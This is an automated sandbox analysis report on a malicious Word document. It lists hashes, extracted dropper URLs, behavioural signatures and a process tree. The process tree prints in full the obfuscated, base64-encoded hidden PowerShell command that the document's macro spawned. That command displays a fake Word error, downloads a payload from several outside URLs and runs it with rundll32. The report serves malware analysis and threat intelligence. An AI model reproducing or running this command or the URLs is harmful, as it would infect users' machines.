Analysis

  • max time kernel
    69s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22-02-2021 17:32

General

  • Target

    DXXclarationsXprXXtesXPourXvisualiser.doc

  • Size

    84KB

  • MD5

    f39a42c8cf3c23846e1ade115fb3a996

  • SHA1

    05e03f3137daeb4e5d8f668c76bf84ca663af941

  • SHA256

    636aa231e7d46a77ce7e31df533afa4a4fccd70beb5e71a1be8edb7e17dadb7c

  • SHA512

    3d73f2854d426ed079b84117470e32f31d9551cdec02146f980949eb8529ce2f5b8585911d08630c83d4d351e2241d1555dff5ef9f5e8411f1cfc1f29518dc18

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.bidwincash.com/wp-admin/8NUY/

exe.dropper

http://psishops.com/wp-admin/MSInfo/

exe.dropper

http://messenger-courier.com/content/Service/

exe.dropper

http://redmanns-way.com/jeff-intervention-txqikkf/Engines/

exe.dropper

http://alrlawsv.com/explain-functions-kuubxdu/4LAy/

exe.dropper

http://arefhasan.com/wp-admin/z/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DXXclarationsXprXXtesXPourXvisualiser.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1208
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABTAFYAIAAgACgAJwAzAFYAJwArACcAUQAnACkAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsAMwB9AHsANgB9AHsAMAB9AHsANAB9AHsAMgB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBlACcALAAnAFkAJwAsACcAbwAuAGQAaQByAGUAQwBUACcALAAnAHMAeQAnACwAJwBtAC4ASQAnACwAJwBPAHIAJwAsACcAcwBUACcAKQApACAAOwAgACQATwAwAGsAaQAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA3AH0AewAxAH0AewA1AH0AewAyAH0AewAzAH0AewA2AH0AewA4AH0AewAwAH0AewA0AH0AIgAgAC0ARgAnAGEAJwAsACcAbQAuAE4AJwAsACcAcwBFAHIAJwAsACcAVgBJAGMAJwAsACcARwBlAHIAJwAsACcAZQBUAC4AJwAsACcARQBQACcALAAnAFMAWQBTAHQARQAnACwAJwBvAGkATgB0AE0AYQBOACcAKQAgACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQBsAGUAJwArACcAbgB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AJwApACsAJwB0ACcAKwAoACcAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQAQwB6ADIAdwB1AHMAbAA9ACQAQgBfADYASQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVwAyADAATwA7ACQASgA2ADgAUQA9ACgAKAAnAFgAMwAnACsAJwA4ACcAKQArACcASQAnACkAOwAgACAAKAAgAEcAZQBUAC0ASQBUAGUAbQAgACgAIgBWAGEAIgArACIAUgBpAEEAYgBMAEUAOgAiACsAIgAzACIAKwAiAHYAUQAiACkAIAApAC4AdgBhAEwAVQBlADoAOgAiAGMAcgBlAGAAQQB0AEUAZABJAFIARQBjAGAAVABgAG8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwACcAKwAnAH0AUgAnACsAKAAnADEAMQAnACsAJwBwADcAcwAnACkAKwAnADkAewAwAH0ATwAnACsAJwBlAHcAaAA4AG0AdwB7ACcAKwAnADAAfQAnACkALQBGACAAIABbAEMASABhAHIAXQA5ADIAKQApADsAJABQADkANwBOAD0AKAAnAEUAMAAnACsAJwBfAFMAJwApADsAIAAoAGkAdABlAG0AIAAgACgAJwBWAGEAJwArACcAcgBpAGEAQgAnACsAJwBsAEUAOgBvADAAawAnACsAJwBJACcAKQApAC4AdgBBAGwAdQBFADoAOgAiAFMAZQBgAEMAdQBSAEkAVAB5AHAAYABSAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQAQwA5ADEARwA9ACgAJwBPAF8AJwArACcAXwBUACcAKQA7ACQAQQAyAGQAbwBlAGwAZwAgAD0AIAAoACcAUAAnACsAKAAnADAAJwArACcAMABBACcAKQApADsAJABMADQAMABFAD0AKAAoACcAWQAnACsAJwAzADEAJwApACsAJwBYACcAKQA7ACQASwB2AGIAXwBwAGwAaAA9ACQASABPAE0ARQArACgAKAAnAHAAJwArACgAJwBXAHgAJwArACcAUgAnACkAKwAnADEAMQAnACsAKAAnAHAANwBzACcAKwAnADkAcABXACcAKwAnAHgATwBlACcAKQArACgAJwB3AGgAOABtAHcAJwArACcAcABXACcAKQArACcAeAAnACkAIAAtAGMAUgBlAHAATABhAGMAZQAgACAAKABbAEMASABhAHIAXQAxADEAMgArAFsAQwBIAGEAcgBdADgANwArAFsAQwBIAGEAcgBdADEAMgAwACkALABbAEMASABhAHIAXQA5ADIAKQArACQAQQAyAGQAbwBlAGwAZwArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEgANAAxAE0APQAoACgAJwBaADIAJwArACcAMwAnACkAKwAnAFAAJwApADsAJABWAGoAcgB0AGMAegBqAD0AKAAoACcAXQAnACsAJwBiADIAJwApACsAJwBbACcAKwAoACcAcwAnACsAJwA6AC8AJwApACsAJwAvAHcAJwArACgAJwB3AHcALgBiAGkAZAAnACsAJwB3AGkAbgAnACsAJwBjAGEAJwArACcAcwBoAC4AYwAnACsAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAnAGEAJwArACgAJwBkAG0AJwArACcAaQBuACcAKQArACgAJwAvADgAJwArACcATgBVAFkALwAnACkAKwAoACcAQAAnACsAJwBdAGIAMgBbACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAcAAnACsAKAAnAHMAJwArACcAaQBzACcAKQArACgAJwBoACcAKwAnAG8AcAAnACsAJwBzAC4AYwBvAG0AJwArACcALwB3AHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AaQBuACcAKQArACgAJwAvAE0AUwBJACcAKwAnAG4AJwApACsAKAAnAGYAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAcwAnACkAKwAnADoALwAnACsAKAAnAC8AJwArACcAbQBlACcAKQArACgAJwBzAHMAZQAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAGUAcgAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAdQByACcAKQArACgAJwBpAGUAJwArACcAcgAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvACcAKwAnAGMAbwAnACkAKwAoACcAbgAnACsAJwB0ACcAKwAnAGUAbgB0AC8AUwBlACcAKQArACgAJwByAHYAJwArACcAaQBjACcAKQArACcAZQAvACcAKwAoACcAQABdAGIAJwArACcAMgAnACkAKwAoACcAWwBzADoALwAnACsAJwAvAHIAZQAnACkAKwAoACcAZABtAGEAbgAnACsAJwBuAHMAJwArACcALQB3AGEAJwApACsAKAAnAHkALgBjAG8AJwArACcAbQAvACcAKwAnAGoAZQAnACkAKwAnAGYAJwArACcAZgAtACcAKwAoACcAaQBuAHQAZQAnACsAJwByAHYAZQBuACcAKQArACcAdAAnACsAJwBpACcAKwAoACcAbwBuAC0AdAAnACsAJwB4ACcAKQArACgAJwBxACcAKwAnAGkAawBrAGYALwAnACkAKwAnAEUAbgAnACsAKAAnAGcAaQBuAGUAcwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGEAbAAnACsAKAAnAHIAbABhAHcAJwArACcAcwB2AC4AYwBvACcAKwAnAG0AJwArACcALwBlACcAKQArACgAJwB4AHAAbAAnACsAJwBhAGkAJwArACcAbgAnACkAKwAoACcALQBmAHUAbgBjAHQAaQBvACcAKwAnAG4AJwArACcAcwAtAGsAdQB1ACcAKwAnAGIAJwApACsAKAAnAHgAJwArACcAZAB1AC8ANAAnACkAKwAnAEwAQQAnACsAJwB5AC8AJwArACgAJwBAAF0AJwArACcAYgAnACkAKwAoACcAMgAnACsAJwBbAHMAJwArACcAOgAvAC8AJwApACsAJwBhACcAKwAnAHIAZQAnACsAKAAnAGYAaAAnACsAJwBhACcAKQArACgAJwBzAGEAbgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAbQBpACcAKwAnAG4ALwB6ACcAKwAnAC8AJwApACkALgAiAHIAYABFAGAAcABsAEEAQwBlACIAKAAoACcAXQAnACsAKAAnAGIAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAEwASQBUACIAKAAkAE8ANQA1AEMAIAArACAAJABDAHoAMgB3AHUAcwBsACAAKwAgACQAWQAzAF8ATgApADsAJABVAF8ANwBKAD0AKAAnAFgAJwArACgAJwBfADkAJwArACcAQQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgAyADYAcgBnAG8AaQAgAGkAbgAgACQAVgBqAHIAdABjAHoAagApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AHMAdABlAG0ALgBuAGUAVAAuAHcAZQBCAEMATABpAEUAbgBUACkALgAiAEQATwB3AG4AbABPAGAAQQBgAGQAZgBJAGAATABlACIAKAAkAEYAMgA2AHIAZwBvAGkALAAgACQASwB2AGIAXwBwAGwAaAApADsAJABYADkAMgBKAD0AKAAnAEYAJwArACgAJwBfACcAKwAnADYASQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABLAHYAYgBfAHAAbABoACkALgAiAEwAZQBOAEcAYABUAGgAIgAgAC0AZwBlACAANAA2ADQANgA2ACkAIAB7ACYAKAAnAHIAJwArACcAdQAnACsAJwBuAGQAbABsADMAMgAnACkAIAAkAEsAdgBiAF8AcABsAGgALAAoACgAJwBDAG8AbgB0AHIAJwArACcAbwAnACkAKwAoACcAbABfAFIAdQAnACsAJwBuAEQAJwApACsAJwBMACcAKwAnAEwAJwApAC4AIgB0AE8AYABzAHQAUgBJAE4ARwAiACgAKQA7ACQAUQAzADQAUAA9ACgAJwBXADkAJwArACcAOQBVACcAKQA7AGIAcgBlAGEAawA7ACQARgA2ADkAQwA9ACgAKAAnAFQAOAAnACsAJwAyACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMgA3AFcAPQAoACcARgAxACcAKwAnADAARQAnACkA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1356
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IABTAFYAIAAgACgAJwAzAFYAJwArACcAUQAnACkAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsAMwB9AHsANgB9AHsAMAB9AHsANAB9AHsAMgB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBlACcALAAnAFkAJwAsACcAbwAuAGQAaQByAGUAQwBUACcALAAnAHMAeQAnACwAJwBtAC4ASQAnACwAJwBPAHIAJwAsACcAcwBUACcAKQApACAAOwAgACQATwAwAGsAaQAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA3AH0AewAxAH0AewA1AH0AewAyAH0AewAzAH0AewA2AH0AewA4AH0AewAwAH0AewA0AH0AIgAgAC0ARgAnAGEAJwAsACcAbQAuAE4AJwAsACcAcwBFAHIAJwAsACcAVgBJAGMAJwAsACcARwBlAHIAJwAsACcAZQBUAC4AJwAsACcARQBQACcALAAnAFMAWQBTAHQARQAnACwAJwBvAGkATgB0AE0AYQBOACcAKQAgACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQBsAGUAJwArACcAbgB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AJwApACsAJwB0ACcAKwAoACcAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQAQwB6ADIAdwB1AHMAbAA9ACQAQgBfADYASQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVwAyADAATwA7ACQASgA2ADgAUQA9ACgAKAAnAFgAMwAnACsAJwA4ACcAKQArACcASQAnACkAOwAgACAAKAAgAEcAZQBUAC0ASQBUAGUAbQAgACgAIgBWAGEAIgArACIAUgBpAEEAYgBMAEUAOgAiACsAIgAzACIAKwAiAHYAUQAiACkAIAApAC4AdgBhAEwAVQBlADoAOgAiAGMAcgBlAGAAQQB0AEUAZABJAFIARQBjAGAAVABgAG8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwACcAKwAnAH0AUgAnACsAKAAnADEAMQAnACsAJwBwADcAcwAnACkAKwAnADkAewAwAH0ATwAnACsAJwBlAHcAaAA4AG0AdwB7ACcAKwAnADAAfQAnACkALQBGACAAIABbAEMASABhAHIAXQA5ADIAKQApADsAJABQADkANwBOAD0AKAAnAEUAMAAnACsAJwBfAFMAJwApADsAIAAoAGkAdABlAG0AIAAgACgAJwBWAGEAJwArACcAcgBpAGEAQgAnACsAJwBsAEUAOgBvADAAawAnACsAJwBJACcAKQApAC4AdgBBAGwAdQBFADoAOgAiAFMAZQBgAEMAdQBSAEkAVAB5AHAAYABSAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQAQwA5ADEARwA9ACgAJwBPAF8AJwArACcAXwBUACcAKQA7ACQAQQAyAGQAbwBlAGwAZwAgAD0AIAAoACcAUAAnACsAKAAnADAAJwArACcAMABBACcAKQApADsAJABMADQAMABFAD0AKAAoACcAWQAnACsAJwAzADEAJwApACsAJwBYACcAKQA7ACQASwB2AGIAXwBwAGwAaAA9ACQASABPAE0ARQArACgAKAAnAHAAJwArACgAJwBXAHgAJwArACcAUgAnACkAKwAnADEAMQAnACsAKAAnAHAANwBzACcAKwAnADkAcABXACcAKwAnAHgATwBlACcAKQArACgAJwB3AGgAOABtAHcAJwArACcAcABXACcAKQArACcAeAAnACkAIAAtAGMAUgBlAHAATABhAGMAZQAgACAAKABbAEMASABhAHIAXQAxADEAMgArAFsAQwBIAGEAcgBdADgANwArAFsAQwBIAGEAcgBdADEAMgAwACkALABbAEMASABhAHIAXQA5ADIAKQArACQAQQAyAGQAbwBlAGwAZwArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEgANAAxAE0APQAoACgAJwBaADIAJwArACcAMwAnACkAKwAnAFAAJwApADsAJABWAGoAcgB0AGMAegBqAD0AKAAoACcAXQAnACsAJwBiADIAJwApACsAJwBbACcAKwAoACcAcwAnACsAJwA6AC8AJwApACsAJwAvAHcAJwArACgAJwB3AHcALgBiAGkAZAAnACsAJwB3AGkAbgAnACsAJwBjAGEAJwArACcAcwBoAC4AYwAnACsAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAnAGEAJwArACgAJwBkAG0AJwArACcAaQBuACcAKQArACgAJwAvADgAJwArACcATgBVAFkALwAnACkAKwAoACcAQAAnACsAJwBdAGIAMgBbACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAcAAnACsAKAAnAHMAJwArACcAaQBzACcAKQArACgAJwBoACcAKwAnAG8AcAAnACsAJwBzAC4AYwBvAG0AJwArACcALwB3AHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AaQBuACcAKQArACgAJwAvAE0AUwBJACcAKwAnAG4AJwApACsAKAAnAGYAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAcwAnACkAKwAnADoALwAnACsAKAAnAC8AJwArACcAbQBlACcAKQArACgAJwBzAHMAZQAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAGUAcgAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAdQByACcAKQArACgAJwBpAGUAJwArACcAcgAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvACcAKwAnAGMAbwAnACkAKwAoACcAbgAnACsAJwB0ACcAKwAnAGUAbgB0AC8AUwBlACcAKQArACgAJwByAHYAJwArACcAaQBjACcAKQArACcAZQAvACcAKwAoACcAQABdAGIAJwArACcAMgAnACkAKwAoACcAWwBzADoALwAnACsAJwAvAHIAZQAnACkAKwAoACcAZABtAGEAbgAnACsAJwBuAHMAJwArACcALQB3AGEAJwApACsAKAAnAHkALgBjAG8AJwArACcAbQAvACcAKwAnAGoAZQAnACkAKwAnAGYAJwArACcAZgAtACcAKwAoACcAaQBuAHQAZQAnACsAJwByAHYAZQBuACcAKQArACcAdAAnACsAJwBpACcAKwAoACcAbwBuAC0AdAAnACsAJwB4ACcAKQArACgAJwBxACcAKwAnAGkAawBrAGYALwAnACkAKwAnAEUAbgAnACsAKAAnAGcAaQBuAGUAcwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGEAbAAnACsAKAAnAHIAbABhAHcAJwArACcAcwB2AC4AYwBvACcAKwAnAG0AJwArACcALwBlACcAKQArACgAJwB4AHAAbAAnACsAJwBhAGkAJwArACcAbgAnACkAKwAoACcALQBmAHUAbgBjAHQAaQBvACcAKwAnAG4AJwArACcAcwAtAGsAdQB1ACcAKwAnAGIAJwApACsAKAAnAHgAJwArACcAZAB1AC8ANAAnACkAKwAnAEwAQQAnACsAJwB5AC8AJwArACgAJwBAAF0AJwArACcAYgAnACkAKwAoACcAMgAnACsAJwBbAHMAJwArACcAOgAvAC8AJwApACsAJwBhACcAKwAnAHIAZQAnACsAKAAnAGYAaAAnACsAJwBhACcAKQArACgAJwBzAGEAbgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAbQBpACcAKwAnAG4ALwB6ACcAKwAnAC8AJwApACkALgAiAHIAYABFAGAAcABsAEEAQwBlACIAKAAoACcAXQAnACsAKAAnAGIAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAEwASQBUACIAKAAkAE8ANQA1AEMAIAArACAAJABDAHoAMgB3AHUAcwBsACAAKwAgACQAWQAzAF8ATgApADsAJABVAF8ANwBKAD0AKAAnAFgAJwArACgAJwBfADkAJwArACcAQQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgAyADYAcgBnAG8AaQAgAGkAbgAgACQAVgBqAHIAdABjAHoAagApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AHMAdABlAG0ALgBuAGUAVAAuAHcAZQBCAEMATABpAEUAbgBUACkALgAiAEQATwB3AG4AbABPAGAAQQBgAGQAZgBJAGAATABlACIAKAAkAEYAMgA2AHIAZwBvAGkALAAgACQASwB2AGIAXwBwAGwAaAApADsAJABYADkAMgBKAD0AKAAnAEYAJwArACgAJwBfACcAKwAnADYASQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABLAHYAYgBfAHAAbABoACkALgAiAEwAZQBOAEcAYABUAGgAIgAgAC0AZwBlACAANAA2ADQANgA2ACkAIAB7ACYAKAAnAHIAJwArACcAdQAnACsAJwBuAGQAbABsADMAMgAnACkAIAAkAEsAdgBiAF8AcABsAGgALAAoACgAJwBDAG8AbgB0AHIAJwArACcAbwAnACkAKwAoACcAbABfAFIAdQAnACsAJwBuAEQAJwApACsAJwBMACcAKwAnAEwAJwApAC4AIgB0AE8AYABzAHQAUgBJAE4ARwAiACgAKQA7ACQAUQAzADQAUAA9ACgAJwBXADkAJwArACcAOQBVACcAKQA7AGIAcgBlAGEAawA7ACQARgA2ADkAQwA9ACgAKAAnAFQAOAAnACsAJwAyACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMgA3AFcAPQAoACcARgAxACcAKwAnADAARQAnACkA
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:636

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/636-11-0x00000000024C0000-0x00000000024C1000-memory.dmp
      Filesize

      4KB

    • memory/636-10-0x000000001AD70000-0x000000001AD71000-memory.dmp
      Filesize

      4KB

    • memory/636-16-0x000000001AC50000-0x000000001AC51000-memory.dmp
      Filesize

      4KB

    • memory/636-15-0x000000001BA30000-0x000000001BA31000-memory.dmp
      Filesize

      4KB

    • memory/636-6-0x0000000000000000-mapping.dmp
    • memory/636-7-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp
      Filesize

      8KB

    • memory/636-14-0x0000000002420000-0x0000000002421000-memory.dmp
      Filesize

      4KB

    • memory/636-9-0x0000000002350000-0x0000000002351000-memory.dmp
      Filesize

      4KB

    • memory/636-8-0x000007FEF5980000-0x000007FEF636C000-memory.dmp
      Filesize

      9.9MB

    • memory/636-13-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
      Filesize

      8KB

    • memory/636-12-0x000000001ACF0000-0x000000001ACF2000-memory.dmp
      Filesize

      8KB

    • memory/1208-2-0x0000000072DC1000-0x0000000072DC4000-memory.dmp
      Filesize

      12KB

    • memory/1208-3-0x0000000070841000-0x0000000070843000-memory.dmp
      Filesize

      8KB

    • memory/1208-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1616-5-0x0000000000000000-mapping.dmp